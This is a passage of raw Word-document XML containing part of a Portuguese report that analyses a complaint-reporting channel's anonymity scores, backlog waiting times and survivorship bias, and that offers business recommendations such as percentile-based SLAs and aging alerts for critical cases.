      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mas há também a leitura incômoda: o score é calculado, exibido e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não altera nada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no fluxo real. Se ele não muda decisão nenhuma, é um número decorativo. A recomendação 6 da seção 4.3.1 trata disso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duas ressalvas metodológicas que o relatório precisa fazer, e ambas são padrão em estatística aplicada: correlação não implica causalidade, e o coeficiente de Pearson só deve ser usado quando a relação entre as variáveis é linear (PENN STATE, [s.d.]b). Um efeito em U, com casos de score muito baixo e muito alto tratados com rapidez por motivos opostos, apareceria como r próximo de zero.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="gráfico-5-anonimato-e-verificabilidade"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.7 Gráfico 5: anonimato e verificabilidade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30"/>
        <w:gridCol w:w="633"/>
        <w:gridCol w:w="1774"/>
        <w:gridCol w:w="1900"/>
        <w:gridCol w:w="1203"/>
        <w:gridCol w:w="10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do canal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 médio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Desvio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Anônimas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75,2 %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59,46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57,5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Identificadas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24,8 %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74,06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14,62</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duas conclusões, e a segunda depende da primeira.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Primeira: o canal anônimo não é exceção, é o canal.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Três em cada quatro denúncias chegam sem identificação. Qualquer decisão de produto que trate o anonimato como caso de borda estará otimizando para a minoria dos usuários.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Segunda: o anonimato tem um custo mensurável.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Denúncias identificadas pontuam 14,6 pontos a mais, em média. Faz sentido, porque quem se identifica costuma fornecer contato, aceita ser questionado e detalha mais. O score reflete verificabilidade, e verificabilidade é justamente o que o anonimato reduz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O erro seria concluir que se deve desestimular o anonimato, e os dados externos explicam por quê. O IPEA estima que apenas 8,5 % dos casos de estupro no Brasil chegam ao conhecimento da polícia (IPEA, 2023), e o regime europeu de proteção a denunciantes reconhece que o receio de retaliação é o que desencoraja a denúncia (UNIÃO EUROPEIA, 2019). Sem anonimato, a maior parte dessas 94 denúncias simplesmente não existiria, e uma denúncia de score 59 que existe vale infinitamente mais que uma de score 74 que nunca foi registrada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A conclusão correta é outra:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">é preciso recuperar verificabilidade sem exigir identificação</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que é exatamente o que o elo de mão dupla do anonimato graduado faz. A autoridade pergunta, a vítima responde, e ninguém precisa saber quem ela é.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkStart w:id="102" w:name="X29e2b8457a6191bafbc76b722410771f9fe431f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.8 Gráfico 6: a espera do backlog, o achado principal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tudo até aqui olhou para casos que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">terminaram</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. As seções 4.2.4 e 4.2.5 mostram uma operação que funciona: os graves saem primeiro, os urgentes saem antes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agora os 49 casos que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ainda não terminaram</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com a espera contada até 04/07/2026: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158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Casos em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Espera média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69,90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Mediana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74,55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Desvio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34,02 dias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Menor e maior espera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6,29 e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">123,80 dias</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E, quebrado pela urgência que o VigIA atribuiu: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30"/>
        <w:gridCol w:w="1730"/>
        <w:gridCol w:w="2329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Urgência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Espera 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Maior espera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78,84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123,55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62,60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123,80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75,67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110,17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77,55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123,04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A ordem desapareceu.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Entre os casos que ainda esperam, a urgência CRÍTICA é a que mais espera: mais do que ALTA, mais do que MÉDIA, mais do que BAIXA. Há cinco denúncias classificadas como críticas paradas há 78,84 dias em média, e uma delas há mais de quatro meses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isto é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">viés de sobrevivência</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e é o achado mais importante desta análise. O conceito tem uma origem célebre: durante a Segunda Guerra, ao analisar onde blindar os aviões, o estatístico Abraham Wald observou que os aviões examinados eram os que voltavam, e que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">what you are forgetting is that the aircraft that are most damaged don’t return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CASSELMAN, 2016). O reforço deveria ir onde os sobreviventes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tinham furos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A analogia é exata. Ao medir apenas o que foi concluído, mede-se justamente o subconjunto de casos que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não ficaram presos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Os casos travados nunca entram na conta do tempo de resposta, não porque foram rápidos, mas porque nunca terminaram. É a mesma família de viés que a epidemiologia formalizou como viés de tempo imortal, em que o período de acompanhamento inclui um intervalo no qual o participante não podia sofrer o desfecho (LEE; NUNAN, 2020). Um painel que exibisse só a média de 5,47 dias estaria descrevendo com precisão uma realidade que exclui os 49 casos onde o sistema está falhando pior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">É por isso que o painel traz o gráfico de espera do backlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ao lado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do gráfico de tempo de conclusão, e não em outra tela. Os dois juntos contam a história; qualquer um deles sozinho conta metade dela.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E é por isso que a fila de prioridade da seção 4.1.2 tem antiguidade como terceiro critério. Uma fila ordenada por urgência e por antiguidade é precisamente o mecanismo de envelhecimento que impediria uma denúncia crítica de envelhecer 123 dias sem que ninguém percebesse.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:id="103" w:name="distribuições-do-canal"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.9 Distribuições do canal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39"/>
        <w:gridCol w:w="939"/>
        <w:gridCol w:w="1141"/>
        <w:gridCol w:w="939"/>
        <w:gridCol w:w="1208"/>
        <w:gridCol w:w="939"/>
        <w:gridCol w:w="872"/>
        <w:gridCol w:w="9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Urgência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Concluída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 (60,8 %)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Violência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(32,8 %)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 (40,8 %)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(30,4 %)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Recebida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 (22,4 %)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Assédio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(21,6 %)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 (32,8 %)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(16,8 %)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Encaminhada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(9,6 %)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 (17,6 %)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(16,0 %)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(10,4 %)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 análise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(7,2 %)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Discriminação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(15,2 %)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(10,4 %)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 e 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e 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Outros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(12,8 %)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RS, CE, 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11, 10, 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Três leituras.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Metade do canal é classificada como alta ou crítica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(51,2 %). Uma escala de urgência em que metade dos casos ocupa os dois níveis superiores perde poder de discriminação: se quase tudo é urgente, nada é. Vale calibrar os limiares do VigIA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Concentração geográfica.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">São Paulo e Rio somam 47,2 % das denúncias. A distribuição encontra paralelo no canal federal: no balanço do Disque 100 relativo a 2024, São Paulo, Rio de Janeiro e Minas Gerais aparecem como as unidades federativas com maior volume de denúncias (MDHC, 2025). A alocação da equipe deveria seguir essa concentração, e não ser uniforme por estado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vinte e oito denúncias ainda em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recebida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que é o primeiro status, o de quem chegou e ninguém abriu. São 22,4 % do canal e a maior parte do backlog analisado em 4.2.8.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="104" w:name="Xe5839f3657b038586b1af56a374044c64e49985"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.10 Como o relatório é montado, do banco à tela</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O caminho completo do número, para que qualquer valor deste documento possa ser rastreado até sua origem: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DenunciaRepository</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">carrega os casos, com filtros resolvidos no banco.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RelatorioService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">calcula o tempo de cada caso a partir da linha do tempo persistida, separa concluídos de abertos e monta os recortes por tipo, urgência, faixa, prazo e grupo de anonimato.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EstatisticaService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recebe listas de números e devolve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Descritiva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Correlacao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sem saber o que os números significam.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RelatorioAnaliticoResponse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">transporta o resultado, com registros aninhados para cada recorte.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GET /api/stats/analitico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entrega o JSON.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estatistica.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">desenha os seis gráficos com Chart.js e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gera a leitura de cada um a partir dos próprios números recebidos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e não de texto fixo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O passo 6 tem uma consequência prática: se a base mudar, a leitura muda junto. Um texto interpretativo escrito à mão no HTML continuaria afirmando a conclusão antiga depois que os dados deixassem de sustentá-la.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O ponto de referência temporal também vem do passo 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">referencia()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolve o maior instante presente na base, e não o relógio do servidor. É o que garante que o painel e este documento impresso digam a mesma coisa daqui a um mês.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8" w:name="X3bbf0f9a148635dc6ed8d6e6fe63da6933df106"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Requisito (c): interpretações e sugestões de negócio</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="106" w:name="as-oito-recomendações"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.1 As oito recomendações</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada uma está amarrada a um número desta análise. Nenhuma delas é uma boa prática genérica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. Definir o SLA pelo percentil 90, não pela média.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prometer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5 dias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com base na média de 5,47 seria uma promessa quebrada em quase metade dos casos: apenas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">52,63 %</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fecham em até 5 dias. Um compromisso público de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">10 dias corridos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é cumprido em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">89,47 %</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dos casos.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43"/>
        <w:gridCol w:w="4189"/>
        <w:gridCol w:w="24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Prazo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Casos que cumprem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Percentual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17,11 %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32,89 %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52,63 %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dias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68,42 %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 dias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89,47 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A recomendação tem duas âncoras externas. A primeira é técnica: a orientação consolidada de engenharia de confiabilidade é definir objetivos por percentis altos, porque um indicador em que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">90% of users’ requests return within 100 ms, but the remaining 10% take 10 seconds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deixa muita gente insatisfeita mesmo com a média boa (GOOGLE, 2018). A segunda é legal: a Lei 13.460/2017 determina que a ouvidoria encaminhe a decisão administrativa final ao usuário</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">observado o prazo de trinta dias, prorrogável de forma justificada uma única vez, por igual período</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(BRASIL, 2017, art. 16). O prazo proposto aqui, de 10 dias, é interno e mais exigente que o legal, e serve para que o limite de 30 dias nunca seja alcançado por inércia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Que esse risco é real, mostra o próprio setor público: em avaliação da CGU referente ao período de novembro de 2022 a outubro de 2023, a Ouvidoria do INSS recebeu 271.696 manifestações e respondeu 268.139, com 23 % delas fora do prazo legal (CGU, 2025). Um SLA descreve o que o cidadão de fato encontra, não o caso médio que quase ninguém vive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. Diferenciar a meta interna por urgência.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O canal já entrega tempos diferentes por urgência; a meta deveria reconhecer isso em vez de tratar todos os casos como iguais. Sugestão calibrada pelo que já se pratica:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CRÍTICA em 48 horas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(mediana atual 2,97 dias),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ALTA em 5 dias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(atual 3,50),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MÉDIA em 8 dias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BAIXA em 15 dias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. São metas atingíveis, mas que exigem manter o desempenho atual. Não é meta de gaveta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. Criar alerta de envelhecimento no backlog. É a recomendação mais urgente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cinco casos CRÍTICA abertos há 78,84 dias em média não é um problema de fila, é um problema de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">visibilidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ninguém está olhando. Regra proposta: caso de urgência CRÍTICA aberto há mais de 7 dias, ou ALTA há mais de 15, gera alerta ao gestor responsável e sobe ao topo do painel. A fila de prioridade já sabe ordenar, e o mecanismo de envelhecimento descrito em 4.1.2 é exatamente a solução que a literatura de escalonamento prescreve para inanição (WANG, 2016). Falta o gatilho que avisa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. Subdividir a categoria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Outros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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">São 11,16 dias de média, 4,3 vezes o tempo de violência, o maior desvio da base (5,53) e o único outlier (22,95 dias). Uma categoria residual sem subtipo prejudica duas coisas ao mesmo tempo: o VigIA tem menos sinal para classificar, e o caso não encontra um destino natural de encaminhamento. Proposta: analisar os relatos dos 16 casos e extrair de dois a quatro subtipos concretos, promovendo-os a categorias próprias. O canal federal oferece precedente de granularidade: o Disque 100 publica recortes temáticos específicos, como o de intolerância religiosa, que somou 2.472 denúncias em 2024 (AGÊNCIA BRASIL, 2025).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5. Investir no elo de mão dupla como recuperação de verificabilidade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O anonimato custa 14,6 pontos de score, e 75,2 % do canal é anônimo. Em vez de tratar isso como limitação aceita, tratar como problema a atacar: o elo de mão dupla permite que a autoridade faça perguntas e a vítima responda sem se identificar.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Métrica proposta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">score médio das denúncias anônimas com elo ativo contra as sem elo. Se o elo estiver funcionando, a diferença de 14,6 pontos deve encolher.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6. Decidir o que fazer com o score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com r igual a −0,091, o score não influencia o tempo de atendimento. São dois caminhos, e escolher é melhor do que deixar como está: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Assumir que é assim mesmo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Gravidade pesa mais que verificabilidade, e o score serve para orientar o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">tratamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do caso, não sua</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">posição na fila</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Neste caminho, o painel deveria deixar isso explícito, para não sugerir influência que não existe.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Passar a usá-lo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Score alto significa caso mais fácil de resolver, e priorizá-lo aumentaria a vazão. Neste caminho, medir de novo em 90 dias e verificar se r se afasta de zero.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">7. Alocar equipe pela concentração geográfica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
